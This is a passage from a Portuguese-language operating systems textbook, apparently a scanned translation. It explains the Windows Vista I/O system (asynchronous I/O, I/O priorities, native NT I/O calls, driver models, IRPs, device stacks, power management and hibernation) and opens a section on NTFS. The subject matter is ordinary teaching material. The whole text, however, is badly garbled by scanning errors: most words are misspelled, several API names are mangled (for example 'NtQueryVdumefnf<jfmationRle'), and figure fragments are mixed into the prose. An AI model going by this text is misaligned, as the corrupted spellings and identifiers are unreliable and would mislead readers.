ca ido. Recuperar um sisiema no ponto dc urna qucda pode 
ser mais diffcil ou ate mesmo impossfvel ja que essas que- 
das ocorrem em te nipo s arbitra rios na execuęao de urna 
aplicaęao, A lei de Murphy diz quc as qucdas tern maior 
probabilidade de acontecer no piór momento posswel, isto 
e, ąuando os dados da aplicaęao estao em um estado em 
que nao e posswcl a recupetaęao. 

Outro aspecto do Windows ć seu suportc a E/S assui- 
crona. E posswel que um thread comecc urna operaęao de 
E/S e entao contimie sendo executado em paralelo corn 
a operaęao de E/S. Essa caracteristjca e cspedalnieme im- 
portante nos servidores. Ha varias maneiras de um thread 
descobrir se u ma operaęao de E/S for concluida. Urna e es- 
pccificar um objęto de evento no momento que a cha mada 
for realizada e, entao, esperar para que de aconteęa, Ou- 
tra e especificar unia fila na qual um evento de conclusao 
sera postado pelo sistema quando n operaęao de E/S esttver 
lerminada. Urna terccira e fornccer um procediniento de 
retorno que seja ehamado pelo sistema quando a operaęao 
de E/S forconduida. U ma quarta e eleger urna localizaęao 
na memói ia que o gerendador dc E/S atualize quando a 
operaęao estiver concluida. 

O aspecto finał que vamos mencionar e a E/S prioriza- 
da, que fol introduzida no Windows Vista. A prioridade de 
E/S e determinada pela prioridade do thread em questao 
ou pode ser configu rada de forma explfclta. Ha cinco prio- 
rrdades especificadas: cntiai altu nor mai baka e minio baka . 
A crftica e reservada para que o gerendador de memória 
impeęa a ocorrencia de impasses que poderiam, de outra 
forma, acontecer quando o sistema estivesse sob extrema 
pressao corn relaęao a memória, As prioridades baixa e mui- 
to baixa sao usadas em processos de segundo piano, como 
o servięo de desfragmentaęao de disco, detectorcs de spy- 
ware e busca na area de trabalho, que tentam nao mterferir 
na operaęao norma! do sistema. A maior parte das E/S tern 
prioridade normal, mas aplicaęoes inultimfdia podem tnar- 
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car suas operaęoes de E/S como alias para evilarem falhas. 
Essas aplicaęoes podem, de forma alternativa, usar reserva 
de largura de banda para solicUar largura de banda ga- 
ramida para acessar arquivos em tempo cntico, como musi- 
cas ou videos, O sistema de E/S fomecera a aplicaęao quan- 
tidades ot i mi za da s para o melhor tamanho dc transferćnria 
c o nu mero de operaęoes pendentes dc E/S quc dcvcriam 
ser mantidas para que ele consiga alingir a garantia da lar¬ 
gura de banda solidiada 

n.7,2 I chamadas API de entrada/saida 

As chamadas AF1 dc sistema forneddas pelo gerendador 
de E/S nao sao muito diferentes das ofereddas pda maioria 
dos sistemas operadonais, As operaęoes basicas sao open, read, 
write, ioctl c dose, mas tambem ha recursos proruos para usar 
e operaęoes de energia, operaęoes para configuraęao de pa- 
rametros, descarga de buffers de sistema etc. Na camada do 
Win32, essas APIs sao envolvidas por inicrfaces que oferecem 
operaęoes de alto invel espedlicas para alguns disposiiivos em 
part i cu lar. No funda porem, esses irwólucros abrern os dis- 
positiYos c realizam esses tipos basicas dc operaęoes. Ale al¬ 
gom as operaęoes com meta da dos, como renomear arquivos, 
saoimplementadassem chamadas de sistema cspedficas, Elas 
apenas usam urna versao cspedal das operaęoes ioctl Isso vai 
fazer mais sen lido quando explicarmos a irnpiementaęao de 
pilhas de dispositivos de E/S e o uso de pacotes de solicilaęao 
de E/S (IRPs) pelo gerendador de E/S, 

As chamadas dc sistema de E/S nativas do NT, em eon- 
sonancia com a filosofia geral do Windows, usam muitos 
parametros e induern rnuitas variaęóes. A Tabela 11.17 
lista as interfaces de chamadas de sistema piimarias do ge- 
renciador de E/S. A NtCreateFile e usada para abdr arquivos 
existemcs ou novos. Ela oferece descritores dc seguranęa 
para novos arquivos, urna rica descrięao dos dircitos de 
acesso solicitados, e da ao criador de novos arquivos alguni 
controle sobre como os blocos scrao alocados, As chama¬ 
das NtReadRfe e NtWriteFife recebcm o manipulador, buffer e 
tamanho dc um arquivo. Elas tambem recebcm um deslo- 
caniemo expltciio dc arquivo e permitem que unia diave 
seja cspecificada para acessar intcrvalos dc bytes bloquea- 
dos em um arquivo. A maior parte dos parametros esta rc- 
ladonada com a espedficaęao de qual dos metodos dife¬ 
rentes usar para reportar a conclusao da operaęao (talvcz 
assmeroua) de E/S, como descrito anteriormente. 

A cha mada NtOueryKrectoryRIe e um exemplo de um 
paradigma-padrao no executivo onde varias APIs de busca 
cxislem para acessar ou modificar informaęócs sobre tipos 
espcdficos dc objetos. Ncsse caso, sao os objetos de arquivo 
que se referem a os diretórios, Um pa ran Kiro espccifica que 
lipo de in forma ęao esta sendo sol i ci lado, como urna lista dos 
nom es no diretório ou inforuiaęoes detal ha das sobre ca da 
arquivo necessario para urna liśtagem estendida do diretó- 
rio. Como isso e, na verdadc, urna operaęao de E/S, todas 
as formas-padrao de reportar que a operaęao de E/S foi eon- 
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Chamada de sistema de E/S 

Descrięao 

NtCreatefife 

Abre arquivos ou dispositivos novo$ ou existentes 

NtReadFile 

Le a partir de um arquivo ou dispositivo 

NtWriteFile 

Grava em um arqoivo ou dEspositivo 

NtOueryDirectoryFile 

Soilcita informagdes sobre um diretório. inciuindo os arquivos 

NtQueryVdumef nfomaation Fi le 

Solicita informaęoes sobre um volume 

NiSetVolumefnformationFi1e 

Modifica as informaęoes de volume 

NtNot ifyGhan geDirectory Rle 

Oortcluida quando qualquer arquivo no diretório o u subdiretório e modiflcado 

N tGuery informat ion Fi le 

Solicita informaęoes sobre um arquivo 

NtSetlnformationFile 

Modifica as informaęoes do anquivo 

NtLockFile 

Bloqueia um intervalo de bytes em um arquivo 

NtUnlockRle 

Remove um bloqueio de śnten/afo 

NtFsControlFile 

Operaęoes dfversas em um arquivo 

NtPushBuffersFiie 

Descarrega para 0 disco os buffers de arquivo em memóna 

NtCancelloFile 

Cancela operaęoes de E/S pendentes em um arquivo 

NtDeviceloCon troi File 

Operaęoes especiais em um dispositivo 


I Tabela 11.17 Cbamadas APl nativas do NT para realizar E/S. 

duida sao suportadas, A chama da NtQueryVdumefnf<jfmationRle 
ć como a operaęao dc bnsca de diretório, mas espera um 
descritor de arqnivo que representa um volume aberto que 
pode on nao conter um sistema de arqtiivos, Ao contrario 
dos diretórios, ha param et ros que podem ser modificados 
nos yolumes e r por essa razao, ha uma API separada, a 
N tSetVolu me I nformattonFi le. 

A chamada NtNotifyChangeDirectoyFife ć um exemplo dc 
um paradigma interessantc do NT, Os threads podem reaiizar 
E/S para determinarsc quaisquer mudanęas ocorrem aos ob- 
jetos (principaImente diretórios de sistema de arqtiivo$, nesse 
caso, ou chaves do registru). Como a E/S ć assmerona, o tliread 
reiorna e continua e só e notificado depois, quando alguma 
coisa e modilkada. A solicitaęao pendente e posta na fila do 
sistema de arquivos como uma operaęao de E/S pendente 
usando um pacote de solidtaęao de E/S (IRP — li O reąuest 
packet). As notificaęoes sao problematicas quando se quer rc- 
mover um vohime de sistema de arquivos a partir do sistema, 
porąue as operaęoes de E/S estao pendentes* Logo, o Windows 
da su porte a fadlidades para cancelar operaęoes pendentes, 
induindo su porte no sistema de arquivos para desmontar, de 
maneira foręada, um volum.e com E/S pendente. 

A chamada NtOuerylnformationFiie e a versao espeafica 
para arquivos da chamada de sistemas para os diretórios. 
Ela tern uma chamada de sistema a rampa n han te, a MtSet- 
InformationRie, Essas interfaces a cc ssani e modificam todo 
lipo de informaęao sohre os nomes dos arquivos, caracte- 
nsticas como codificaęao, compressao e dtspersao e outros 


atributos e detalhes do arquivo, induindo a pesquisa de seu 
ID interno 011 a atribuięao de um nonie binario linico (ID 
de objęto) a um arquivo. 

Essas cha mada s de sistema sao, na essenda, unia for¬ 
ma da ioctl espeafica para arquivos. A operaęao Set pode 
ser u sada para renomear o u apagar um arquivo. Emre- 
tamo, notę que elas recebem mampuladores, nao nomes 
de arquivo; logo, um arquivo deve primeiro ser aberto 
antes de ser renomeado ou apagado. Elas tambem podem 
ser usadas para renomear fluxos dc dados ahernativos no 
NTFS (veja a Seęao i i.8). 

As APIs separadas, NtLockFile e NtUnlockFile, existem para 
configurar e remover bloąueios de intervalo de bytes em ar- 
quivos. A NtCreateRle permite que o acesso a um arquivo in- 
teiro seja restringido por meio do uso de um modo de ram¬ 
pa rti Ilia niemo. Uma altemativa sao as APIs de bloqueio, que 
aplicam rcstrięóes de acesso obrigatorias a um mtervalo dc 
bytes 110 arquivo, Lcituras e gravaęoes dcvcm fomeccr uma 
dum quc combinc com a chavc fornccida para a NILockFife 
com o objetivo dc operar nos intervalos bloqueados t 

Recursos similares existem 110 UNIX P mas nele e ar- 
bitrano se as aplicaęoes prestam atenęao aos bloqueios de 
intern lo. A NtFsControlFile e muito pa red da com as ope- 
raędes ameriores Query e Set, mas e uma operaęao mais 
gcncrica, com o objctivo dc tratar operaęoes cspcaficas 
dc arquivos quc nao combi nam com as outras APIs. Por 
cxemplo, algumas operaęoes sao espedfkas a um sistema 
de arqutvos particular. 
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Por firn, ha chamadas diversas, como a NtFlushBuffers 
File, que, como a chama da sync do UNIX, foręa a gravaęao dc 
dados do sistema dc arquivos dc volta no disco; a NtCancello- 
File, para cancclar soliritaęoes de E/S pendentes para u ni 
arqiilvo particular, e a NtDeyiceioControfFile, que implemema 
operaęoes iocll para os dispositivos. A lista de operaęoes e, 
na verdade, bem mais extensa. Ha chamadas de sistema 
para deletar arquivos pelo nome e pesquisar os atributos 
de um arquivo especffico — mas essas que listamos sao 
apenas iiwólucros para as out ras operaęoes do gerenciador 
de E/S e na o predsam realmente ser implementadas como 
chamadas de sistema separadas* Ha tambem chamadas dc 
sistema para tratar de portas de conclusao de E/S, um 
recnrso dc cnfileiramento no Windows que aj uda servido- 
res muhithread a Fazę rem uso efkiente de operaęoes assm- 
tronas de E/S colocando os ihreads cm estado de pronto 
por demanda e redli zin do o mi mero de trocas de coniexto 
necessarias para servir E/S ern threads dedtcados. 

11-7.3 I implementaęao de E/S 

O sistema de E/S do Windows consiste de servięos 
plug-and-play, o gerenciador de energia, o gerenciador de 
E/S e o modelo de driver de dispositivo. Os recursos pron- 
tos para usar deiectam mudanęas na configuraęao do hard¬ 
ware e constroem on destroem as pilhas de dispositivos 
para cada dispositivo, bem como ca u sam o ca rr ega niemo 
ou descarregamcnto dos drivers dc dispositivos. O geren¬ 
ciador dc energia ajusta o esiado dc energia dos dispositi- 
vos dc E/S para reduzir o consumo dc energia do sistema 
quando os dispositivos nao estao em uso. O gerenciador de 
E/S okręcę suporte para manipuiar os objetos de E/S do 
nucleo, e operaęoes baseadas em IRP, como loCalJDrivers e 
loCompteteReąuest, mas a maior parte do t raba 1 ho necessa- 
rio para dar suporte a E/S do Windows e implementada 
pelos próprios drivers de dispositivos. 

Drivers de disposttivos 

Para garantir que os drivers de dispositivos funcioncm 
bem com o resio do Windows Vista, a Microsoft definni o 
WDM (modelo de driyers do Windows — Windows drmr 
model), com o qual os drivers de disposilWos devem ser con- 
frontados, O WDM foi projetado para funrionar tamo com o 
Windows 98 ąuanto com as diferentes versoes do Windows 
baseadas em NI, comeęando com o Windows 2000, permi- 
tindo que drivcrs escritos com ca u te la fossem compatfveis 
com os dois sistemas. Ha um kit dc deseńvolvhnento (o Kil 
dc Drivcr do Windows), que c projetado para ajudar os de¬ 
sę nvolvedoi es dc drivcrs a produzir drivcrs cm conformi- 
dade. A maioria dos drivcrs do Windows comeęa copiando 
urna amosira apropriada de driver e modificando-a, 

A Microsoft tambem oferece um verificador de dri- 
ver que valida muitas das aęóes dos drivers para se assegu- 
rar dc que des estao em confonnidade com os requisitos 
do WDM para estru tura c protocolos dc solicitaęocs de E/S, 
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gerenciamemo de memória etc. O verificador faz parte do 
sistema e os administradores podem controla-lo execut a li¬ 
do verifier.exe, o que Ihes permite configurar quais drivers 
devem ser verifkados e quao extensa (ou seja, custosa) a 
vcrificaęao deve sen 

Mesmo com todo o suporte para desenvolvimento e 
verificaęao de driver, ainda e muito dificil e$crever ate mes¬ 
mo drivers simples no Windows, de forma que a Micro¬ 
soft construiu um sistema de iiwólucros chamadode WDF 
(fundamentos de driver do Windows — Windows drmr 
fointdatiołt), que e executado a ci ma do WDM e simplifica 
muitos dos requisitos mais comims, a maioria relacionada a 
imeraęao correta com o gerenciador de energia e operaęoes 
pronias para usar. 

Para simplificar ainda mais a escńla dc drivcrs, as- 
sitn como aumenlar a robusicz do sistema, o WDF mdiii 
a UMDF (arcabouęo para driyer do modo usuario — 
tuer-mode drmrframework) para eserever drivers como servi- 
ęos que sao executados nos processos. E ba a KMDF (arca¬ 
bouęo para driver do modo nficleo — kernei-mode drmr 
framework) para escrever drivers como servięos que sao exe- 
cutados no nucleo, mas tornando muitos deialhes do WDM 
automagicos. Como o que oferece o modelo de dnvers por 
baixo disso e o WDM r e nele que focaremos nesta seęao. 

Os dispositivos no Windows sao representados por ob¬ 
jęłoś de dispositivos, quc tambem sao usados para repre- 
seutar hardware, como barramentos, assim como abstra- 
ęóes de software como sistemas de arquivos, mecanismos 
de protocolo de rede e extensoes de mldeo, como drivers de 
Filtro amivirus. Todos esses sao organizados por meio da 
produęao do que o Windows chama de piłka de dispositwos, 
comoexibido anteriormente na Figura 1 L7. 

As operaęoes dc E/S sao imcializadas pelo gerenciador 
de E/S chamando urna A PI do cxccuttvo, loCallDriver, com 
ponteiros para o objęto de dispositivo no top o e para o IRP 
represeniando a solicitaęao de E/S, Essa roli na encontra o 
objęto de driver associado ao objęto de dispositivo. Os ti- 
pos de operaęao especificados no IRP, de modo geral, cor- 
respondem as chamadas dc sistema do gerenciador de E/S 
descritas anieriormente, como CREATE, READ e CLOSE* 

A Figura 11.21 apresenta os relacionamenlos dc um 
unico niVd da pilha de dispositivos. Para cada urna dessas 
operaęoes, um driver deve especificar um porno dc cm ra¬ 
da. A cha mada loCallDriver obtem o lipo de operaęao do IRP, 
usa o objęto de disposilivo no nfvel alual da pilha dc dispo- 
sitiyos para encontrar o objęto de driver e busca na tabela 
de despacho dc driver com o tipo de operaęao o porno de 
entrada do driver correspondente, O driver e entao chama- 
do e recebe o objęto de dispo$itivo e o IRR 

Urna vezque o driver tenha term mado o processamen- 
to da solicitaęao representada pelo JRP, ele tern tres opęoes. 
Ele pode chamar a loCallDriver mais uma vez, passando o IRP 
e o próximo objęto de disposilivo na [iiiha de disposilivos; 
pode de cl a rar a conclusao da solicitaęao de E/S e retomar a 
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Objęto de dispositivo Diiver de dispositiyo carr&gado 



1 Figura 11.21 Um unico nivel ern urna pilha de dispositivos. 


quem demon a chama da; o u pode por o IRP cm fila inter- 
namente e retornar a quem efetuou a cha mada, Lendo cie¬ 
cia rado que a solicitaęao cle E/S ainda esta pendenie. Esse 
ultimo caso resulta em inna operaęao de E/S a ss merona, se 
pelo men os se todos os drivers adma na pilha concordarem 
e tambem reiornarem a os sens chamadores, 

Pacotes de solicitaęao de E/S 

A Figura 11.22 apresenta os campos prindpais do IRP. 
O fundamento do IRP e um vetor dimensionado de for¬ 
ma dinainica eomendo campos que podem ser usados por 
cada driver para a pilha de dispositivos que esteja trata udo 
a solicitaęao. Esses campos de pilha tanibem permitem que 
um driver espcdfiqtie qtial rotina cha mar ąuando eoruple- 
tar uma solicitaęao de Eł$. Durantc a condusao cada mvd 
da pilha ck dispo$ltivos e visitado na ordom inversa, e pot 
sua vcz a rotina dc condusao atribuida por cada drivcr ć 
chamada. A cada mvel, o driver pode continuara condu¬ 
sao da solicitaęao ou decidir quc Lem mais trabalho a fazer 


c deixar e a solicitaęao pendenie, suspendendo por ora a 
condusao dc E/S. 

Quando esta alocando um IRP, o gerendador de E/S 
deve saber quao profunda e urna pilha de dispositivos em 
particular para q 11 e possa alocar um IRP suficie memento 
grandę. Ele mantem o controle da profitodidade da pilha 
em um campo em cada objęto de dispositivo eon formę a 
pilha de disposilivos e fonnada. Notę qnc nao ha definięao 
formaI do quc e o próximo objęto dc dispo$itivo cm ne¬ 
nii u ma pilha. Essa infbrmaęao c mantida em estru tu ras de 
dados privadas pertcncentes ao driver anterior da pilha. Na 
verdadc\ a pilha nem predsa ser uma pilha; cm qualquer 
ca mada um driver e livre para alocar tiovos IRPs, continuar 
a u.sar o JRPoriginal, ctwiai urna operaęao de E/S para uma 
pilha de disposilkos diferente ou ate mesmo ehavear para 
urn thread operario de sistema para continuar a exccuęao. 

O IRP contem sinalizadores, um cddigo de operaęao 
para indexaęao na tabela de despaeho, ponteiros de buffers 
para, talvez, o buffer do nudeo e do u sua rio e uma lista 



Próximo IRP 


Figura 11.22 Os prindpais campos de um pacote de solicitaęao da E/S. 
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de MDLs {listas de descritores de memória — memory 
desmptor lim), que sao usadas para descrever as paginas ff- 
sicas representadas pelos buflers, isto e, para operaęoes de 
DMA. Ha campos usados para operaęoes de rondusao e 
cancelamento. Os campos no IRP qne sao usados para en- 
fileirar o IRP para disposiiiyos cnąuamo cstivcr cm proces- 
samcnto sao rcutilizados ąuarido a opera ęao dc E/S en filii 
terniina de forneccr memória para o objęto de eon trele dc 
APC usado para cha mar a rotina de conclusao do gerencia- 
dor de E/S no contexto do thread OfiginaL Existc tambern 
um campo dc ligaęao usado para ligar lodos os IRPs pen- 
dentes para o thread que os inidalizom 

Pilhas de dtspositivos 

Um driver no Windows Vista e capaz de fazer todo o 
trabalho sozinho, como faz o driver de impressora da Figura 
11.23. Por outro lado, os drivcrs podem ser empilhados, o 
que significa que unia requisięao pode passar por u ma se- 
quencia de drivers, cada um fazendo unia parte do trabalho. 
Dois drivers empilhados sao ilustrados na Figura 11.23. 

U ni u so comum dos diivers empilhados e sepami o ge- 
rendamento do barramento do trabalho funcional do eon- 
trok real do dispositivo. O gerenciantemo do barramento 
PCI e muito complicado por causa dos diverso$ lipos de 
ni od os e tramaęoes, Separando esse trabalho da parte es- 
peciTtca do disposrtivo, os escritores de drivers nao preci- 
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sam aprender como controlar o barramento: eles podem 
apenas usar o driver de barramento-padrao em sua pilha. 
De maneira semelhante, os drivers USB e SCSI tern urna 
parte especifica do dispositivo c outra parte generica, e os 
drivcrs em comum sao usados pila parte gcncrica. 

Outro uso de drivers em pilha e a capacidade de inserir 
drivers de filtro na pilha. Ja vimos a uiilizaęao de drivers 
de filtro do sistema de arqihvos, que sao inseridos acima do 
sisteina de arqnivos. Drivers de filtro tambern sao usados 
para gerenciar o hardware lisico. O driver tle filtro rcalF 
za algumas transformaęoes nas operaęoes a medida que o 
IRP atravcssa a pilha de dispositiyos, asshn como durante 
a operaęao dc conclusao com o IRP subindo a pilha atraves 
das rotinas de conclusao cspccificadas por cada driven Por 
excmpio < um drivcr de filtro poderia comprimir os dados a 
ca min ho do disco ou codificar os dados a caminho da rede* 
Colocar o filtro aqui significa que nem a aplicaęao, nem o 
verdadeiro diwer do dispositivo tein de estar a ten to a isso, 
e isso funciona de modo automatico para lodos os dados 
indo para o dispositivo (ou vindo dele). 

Os drivers de dispositivos do modo nutko sao um pro- 
bierna grave para a estabilidade e eon fi a bil kia de do Windows. 
A maior parte das falhas do niideo no Windows se deve 
aos erros dos drivers de dispositivos. Como os drivers de 
dispositivos do modo nudeo dividem o mesmo espaęo de en- 
dereęamento com as camadas do niideo e executiva, erros 


Frocesso do usuario 



Pilha de 
> dESpOSitivOS 



I Figura 11.23 O Windows permite que os drivers sejam empilhados para funcionar com urna inst§ncia de dispositivo especifica. O 
empiihamento ś representado por objetos de dispositivos. 
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nos drivers podem corromper as estruturas de dados dc 
si stem a, on piór. Alguns desses erros se devem a o n ii mero 
imprcssiommc de driwcrs de dispositivos que exi.siern para 
o Windows, on ao deseń voivimemo de drivers por parte 
de programadores dc sistema menos experientes. Os erros 
tambcm se devem ao grandę numcro dc dctalhes envolvi- 
dos na escrita correta de drivers para o Windows* 

O modelo dc E/S e pode roso c flexfvd, mas loda E/S e 
fundamentalmeme assmcrona; logo, coudięoes de corrida 
podem ser um risco. O Windows 2000 adicionou os recur- 
sos plug-twd-play e o gerenciamento de energia dos sistemas 
Win9x para o Windows baseado no NT pela primcira vez. 
isso coloca urn nu mero grandę dc rcquisitos nos drivers 
para lidarcm de forma correta com os dispositWos i udo e 
vindo, enquanto as pacotes de E/S estao no meio de seu 
processamento. Usuanos dc PCs desktop freąuentemente 
conectam/desconectam dispositivos, fecham as lampas e 
enfurnam os notebooks cm maletas e dc modo gcral nao se 
prcocupam se, poracaso, a peąucna luz vcrdc dc aLividade 
ainda esta acesa. Escrever drivers dc dispositivos que firn- 
cionem dc forma corrcta nesse ambienic pode ser mu i to 
desafiador, o que e o motivo pelo qnal o Fundamentos de 
Drivcr do Windows foi desenvolvido para simplificar o Mo¬ 
dele dc Driver do Windows. 

O gerenciador de energia controla a utiiizaęao de 
energia cm lodo o sistema. Historicamente, o gerendamen- 
to dc consumo dc energia consistia cm desligar a tcla do 
monitor e parar o giro das tmidades de disco, mas a ąuestao 
esta, de forma rapida, licando mais coinplicada, cm virtude 
dos rcąiiisilos para estender o tempo cm que os nolebooks 
podem fundonar só com stias baterias e preocupaęoes de 
conservaęao de energia relacionadas aos computadores 
desktop dcixados ligados todo o tempo e o a lt o custo dc 
forneci niemo dc energia para os imensos parąues de servi- 
dores que existem boje (companhias como a Microsoft e a 
Google estao consiruindo sens parques de servidores perto 
de instaiaęoes de hidrodetricas para conseguirem baixos 
preęos). 

Recursos dc gerenciamento dc energia mais novos in- 
cluem a reduęao de consumo de energia dos componenles 
quarido o sistema nao esta ern uso diaveando d!spositivos 
individnais para o estado de espera c ale desligando-os de 
forma total, usando intemiplores smm. Os niultiprocessa- 
dores desligam CPUs mdividuaisquando nao sao necessarias, 
e ate as taxas de frequencia do relógio da CPU em execuęao 
podem ser diminmdas para reduzir o consumo de energia. 
Quando um processador esta dcsocupado, seu consumo de 
energia tambcm e reduzido, urna vez que nao precisa fazer 
nada exccto aguardar por urna mterrupęao aconrecer 

O Windows da suporte a um modo espedal de desliga- 
mento cha mado hibernaęao, que copia loda a memória li¬ 
sica para o disco e, entao, reduz o consumo dc energia a um 
minusculo fluxo (notebooks podem fundonar por semanas 
em estado de hibernaęao) com baixa utilizaęao da bateria. 
Como todo o estado da memória esta gravado no disco. 


pode-se ate trocar a bateria em um notebook enąuanto eie 
estiyer bibernando. Quando o sistema reinicioliza depois 
da hibernaęao, eie restaura o estado de memória salvo (e 
reiniciahza os dispositivos). Isso traz de voka o cornputador 
ao rncsmo estado que cstava antes da hibernaęao, sem ter 
de refazer a autemicaęao de usuario e inicializar todas as 
aplicaędes e semęos que estavam sendo cxecutados. Mes- 
mo que o Windows lenie melhorar esse processo {incluin- 
do ignoraras paginas nao modificadas que ja estejam salvas 
no disco e comprimindo outras paginas de memória para 
reduzir a ąuantidade de E/S solicitada), ainda pode levar 
muitos segundos para hibernar um notebook ou um siste¬ 
ma desktop com gigabytes de memória. 

Uma alternativa a hibernaęao e um modo cha mado 
modo de espera, no qual o gerenriador dc energia reduz 
o sistema inteiro para o menor estado de energia posstvel, 
usando apenas o sufidente para amalizar a RAM dinami- 
ca. Como a memória nao precisa ser copiada para o disco, 
isso e muito mais rapido que a hibernaęao, Eniretanto, o 
modo dc espera nao e tao confiavcl porąuc o trabalho sera 
perdido se o cornputador perder a energia, ou a bateria for 
trocada cm um notebook, ou em razao dc erros cm varios 
drivers de dispositivos que os reduzem para estado de baixa 
energia, mas depois nao conseguem inicia li/i-los. No de- 
senvolvimemo do Windows Yista, a Microsoft despendeu 
muito esforco melhorando a operaęao do modo dc espera, 
com a cooperaęao de muitos da comumdade de disposi- 
tivos de hardware. Eles tambcm aca barani com a p rat i ca 
de permitir que uma aplicaęao vetassc a enirada do siste¬ 
ma cm modo de espera (o que algumas vezes resultava em 
notebooks superaąuecidos quando usuanos desatentos os 
ianęavam em maletas sem esperar que a luz piscasse). 

Ha muitos ltvros disponweis sobre o Modelo dc Driver 
do Windows e o novo Funda mentos de Driver do Windows 
(Cant, 2005; Oney, 2002; Orwick e Smith, 2007; Yiscarola 
et al. r 2007), 


11.8 


O sistema de arquivos NT do 
Windows 


O Windows Yista da suporte a varios sistemas de ar- 
quivos, dos quais os mais importames sao FAT-ló, FAT-32 
e NTFS (sistema de arquivos do NT — NT fik system)- 
O FAT--16 e usado no antigo sistema de arquivos do MS¬ 
-DOS, que usa endereęo de disco de 16 hits, o que o limita 
a partięoesde disco nao maiores quc 2 GB. Em sua maioria, 
e usado para acessar disquetcs, pelos usuanos que ainda os 
utilizam. O FAT-3 2 usa cndereęos de 32 hits e su porta par- 
tięoes de disco de ate 2 TB. Nao ha seguranęa no FAT-32, e 
boje ele só e de fato usado em midias ptirtateis, como u ni - 
dades Hasiu O NTFS e o sistema de arquivos deseńvolvido 
de forma especffica para a versao NT do Windows. Gonie- 
ęando com o Windows XP, ele se tornou o ststema-padrao 
instalado pela maioria dos fabricantes de cornputador, 
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aumentando bastante a seguranęa e a funcionalidade da 
Windows. O NTFS nsa endereęos de disco de 64 bits e pode 
(na teoria) suportar partięoes de disco de ate T Ą bytes, ainda 
qne outras considcraęoes o limitem a tamanhos menores. 

Nesle ca pitni o, examinarenios o sistema de arquivos 
NTFS, porąnc dc c urn sistema dc arquivos moderno com 
mu i las ca ractcnsti ca s intercssames e inovaęocs no projeto. 
Ele ć nm grandę e complexo sistema de arqmvos, e linii- 
taęóes de espaęo nos impedem de cobrir todas as suas ca- 
racteristicas, mas o materia] apresemado a seguir deve dar 
unia impressao razoavd dclc, 

11.8.11 Conceitos fundamentais 

Nomes dc arquivos indmduais no NTFS sao limitados a 
255 cara eter es; caminhos compleios sao limitados cm 32.767 
caracteres. Os nomes de arquivo$ estao cm Unicode, permi- 
tindo que pcssoas cni pafses que nao u ti lizani o alfabelo 
latino (por exemplo, Grecia, Japao, India, Russia e Israd) 
escrevam os nomes de arquivos em sua lingua nariva. Por 
exemplo, #tXe e urn nome de arquivo perfeitamente legał. 
O NTFS da suporte total a nomes em letras maiusculas e 
miniisculas (log o, foo e diferente de Foo e de FOO). A AP1 do 
Win 32 nao da suporte completo a letras maiusculas e mi- 
nusculas para os nomes de arquivos c liunca para os nomes 
de diretórios. Esse suporte existe ąuando executamos o 
subsistema PQSIX com o objetivo de manier compatibilida- 
de com o UNIK. O Win32 nao e sertsfvd a diferenęa entre 
letras maiusculas e minusculas, mas preserva o lipo usado; 
logo, os nomes de arqtiivos podem ter letras maiusculas e 
miniisculas. Ainda que reconhecera diferenęa entre letras 
maiusculas e minusculas seja uma caracteristica rnuito fa- 
miliar para os usuarios do UNIK, e muito incoiweniente 
para usuarios comuns quc nao fazem essas distinęoes com 
frcąucnda. Por exemplo, a Internet e bastante insensfvel a 
diferenęa entre letras maiusculas e minusculas boje. 

Um arquivo NTFS nao e a pena s uma seąuencia linear de 
bytes, como os arquivos do FAT-32 e do UN1X sao. Em vez 
dissOn um arquivo consistc de varios aiributos, cada qua! 
representado por um fluxo de bytes. A maioria dos arqui- 
vos tem poucos fluxos curtos, como o nonie do arquivo e 
seu ID de objęto de 64 bits, alem de um iongo flnxo (sem 
nome) com os dados. Contudo, um arquivo tambem pode 
ter dois ou mais (longos) fluxos de dados. Gada fluxo tein 
um nome consistindo do nome do arqiuvo, dois pornos e 
o nome do fIuxo, como em foostreaml. Gada fluxo tem seu 
proprio tamanho e pode ser bloąueado de forma indepen- 
dente dos outros fluxos. A ideia de miiltiplos fluxos em 
um arquivo nao e nova no NTFS. O sistema de arquivos do 
Apple Macintosh nsa dois fluxos por arquivo, a ramifica- 
ęao dc dados c a ramificaęao dc rccursos, A primeira uti- 
lizaęao de varios fluxos para o NTFS foi para permitir quc 
um servidor de arquivos do NT servisse a clientcs do Ma¬ 
cintosh. Os Huxos de dados niultiplos tambem sao usados 
para representar metadados sobre arquivos, como as mi- 
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niaturas de imagens JPEG dispomveis na GUI do Windows. 
Entrelanto, infelizmente, os fluxos de dados miiltiplos sao 
Irageis e, com freąuencia, perdeni-se dos arquivos quando 
sao transportados para outros sistemas de arquivos, trans- 
portados pcla rede ou ate mesmo qticindo guardados cm 
um backup c depois rccupcrados, porquc niuitos utilitarios 
os ignorant. 

O NTFS e um sistema de arquivos hierarquico, slmilar 
ao sistema de arquivos do UN1X. O separador entre nomes 
de componentes e em vez de T, um fóssil herdado 
dos requisitos de compatibilidade com o CF/M quando o 
MS-DOS foi criado. Diferente do UNIX, o conceito do dirc- 
tório amal dc funrionamento, ligaęoes estritas para o diretó- 
rio atual (.) e o diretório pai (*.) sao implementadas como 
convenęoes em vez dc unia parte fundamental do projeto 
do sistema dc arquivos, Ligaęoes estritas tem suporte, mas 
sao usadas apenas para o subsistema F0S1X, como e o su- 
jiorie do NTFS para che ca gem de permissao para percorrer 
diretórios (a permissao 'x' no UNIK). 

No NTFS, as ligaęocs simbólicas somente passaram a ser 
suportadas a partii do Windows Vista, A criaęao desse lipo 
de ligaęao normalmente e restrila aos admtmstradores, dc 
fon na a cvitar próbie mas de seguranęa como os aiaques por 
trapaęa (poofin$), que foi o caso do UNIK q u a udo da primei¬ 
ra introduęao das ligaęoes simbólicas na versao 4.2BSD. No 
Vista, a implementaęao de ligaęoes simbólicas titiliza um re- 
curso do NTFS denominado ponto de reanalise (disemido 
mais adiante nesta seęao). Alem disso, tambem sao supor- 
ta dos os recursos de compressao, codificaęao, tolerancia a 
falhas, usodo diario e arquivos esparsos, Essas caracterfsticas 
c suas implcmcntaęocs serao discutidas cni brcvc, 

_ 11-8.2 1 Implementaęao do sistema de 

arquivo$ NTFS 

O NTFS 6 um sistema de arquivos muito compkxo e 
sofisticado, dcscnvolvido cspcdficamcntc para o NT como 
alternativa ao sistema de arquivos HPFS, que foi desenvol- 
vido para o OS/2. Embora a maior parte do NT tenho sido 
projetada em terra firmę, o NTFS e um recurso tinico entre 
os componentes do sistema operacional, visto que a maior 
parte de seu projeto original foi realizada a bordo de um 
barco no Puget Sound (seguindo um protocolo estrito dc 
traba!ho na parte da manlia e cerveja na parte da tarde). 
A seguir, estudaremos varios de scus aspectos, comcęando 
a partir dc sua estru tura e depois passando para a busca, a 
